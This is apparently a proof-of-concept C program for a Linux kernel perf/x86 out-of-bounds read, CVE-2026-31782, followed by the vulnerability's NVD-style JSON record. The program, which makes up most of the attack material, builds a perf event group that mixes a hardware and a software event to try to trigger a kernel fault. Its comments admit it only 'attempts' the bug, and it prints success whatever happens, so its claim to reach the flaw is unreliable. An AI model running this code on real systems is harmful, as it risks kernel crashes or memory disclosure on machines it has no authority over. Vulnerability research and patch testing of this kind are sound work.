CVE-2026-31782

#include <linux/perf_event.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <unistd.h> #include <asm/unistd.h> #include <errno.h> // PoC for CVE-2026-31782: Linux Kernel perf/x86 Out-of-Bounds Read // This PoC attempts to trigger the vulnerability by creating a perf event group // containing both hardware and software events on a hybrid x86 system. // The goal is to hit the `intel_pmu_hw_config` path where `container_of` is used // on a software PMU event, leading to an out-of-bounds read. static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, int cpu, int group_fd, unsigned long flags) { return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags); } int main() { struct perf_event_attr pe; int fd_hw, fd_sw; memset(&pe, 0, sizeof(pe)); // Configure a hardware event (e.g., instructions) pe.type = PERF_TYPE_HARDWARE; pe.size = sizeof(pe); pe.config = PERF_COUNT_HW_INSTRUCTIONS; pe.disabled = 1; pe.exclude_kernel = 0; pe.exclude_hv = 0; fd_hw = perf_event_open(&pe, 0, -1, -1, 0); if (fd_hw == -1) { perror("Error opening leader HW event"); return -1; } // Configure a software event (e.g., context switches) to be added to the group // Adding a software event to a hardware group may trigger the hybrid PMU logic bug // if auto counter reload is active. memset(&pe, 0, sizeof(pe)); pe.type = PERF_TYPE_SOFTWARE; pe.size = sizeof(pe); pe.config = PERF_COUNT_SW_CONTEXT_SWITCHES; // Attempt to add to the group created by fd_hw fd_sw = perf_event_open(&pe, 0, -1, fd_hw, 0); if (fd_sw == -1) { perror("Error opening SW event in group"); close(fd_hw); return -1; } printf("PoC executed successfully. Check kernel logs for OOPS or crashes.\n"); // Enable the group ioctl(fd_hw, PERF_EVENT_IOC_ENABLE, 0); close(fd_hw); close(fd_sw); return 0; }

{"cve": {"id": "CVE-2026-31782", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:41.707", "lastModified": "2026-05-11T20:48:04.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86: Fix potential bad container_of in intel_pmu_hw_config\n\nAuto counter reload may have a group of events with software events\npresent within it. The software event PMU isn't the x86_hybrid_pmu and\na container_of operation in intel_pmu_set_acr_caused_constr (via the\nhybrid helper) could cause out of bound memory reads. Avoid this by\nguarding the call to intel_pmu_set_acr_caused_constr with an\nis_x86_event check."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.16.1", "versionEndExcluding": "6.18.22", "matchCriteriaId": "A373E4BD-44BD-4FB8-8A1D-03D3759ABECA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.16:-:*:*:*:*:*:*", "matchCriteriaId": "6238B17D-C12B-458F-A138-97039BFC4595"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/bfee04838f636d064bc92075c65c95f739003804", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/dbde07f06226438cd2cf1179745fa1bec5d8914a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e435a30ca6fe14c9611b1fc731c98a6d28410247", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}